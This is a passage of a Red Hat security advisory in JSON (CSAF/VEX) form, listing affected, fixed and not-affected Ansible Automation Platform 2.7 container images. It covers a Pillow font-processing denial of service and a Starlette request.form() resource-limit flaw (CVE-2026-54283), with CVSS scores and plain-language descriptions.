"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files"
},
{
"cve": "CVE-2026-54283",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-22T18:01:06.194658+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2491440"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette: request.form() limits silently ignored for application/x-www-form-urlencoded enable DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion. This only affects applications that explicitly call request.form() on urlencoded input; JSON-only APIs and services where Starlette is a transitive dependency not used for form parsing are not affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
